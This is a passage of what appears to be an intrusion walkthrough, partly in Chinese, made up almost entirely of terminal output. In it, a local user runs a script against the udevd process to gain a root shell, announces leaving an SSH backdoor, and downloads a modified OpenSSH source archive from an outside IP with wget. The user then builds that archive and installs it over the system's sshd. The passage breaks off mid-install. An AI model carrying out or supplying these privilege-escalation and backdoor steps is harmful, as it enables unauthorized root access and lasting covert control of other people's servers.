[Abstract]
grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 在函数 ‘main’ 中:
suid.c:3: 警告:隐式声明与内建函数 ‘execl’ 不兼容
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

We already have root privileges.

sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

First, let's leave an ssh backdoor.

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08-- http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:979990 (957K) [application/x-gzip]
Saving t `openssh4.3p2.tar.gz'
100%[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(several lines omitted)
sh-3.1# make && make install
conffile=`echo sshd_config.out |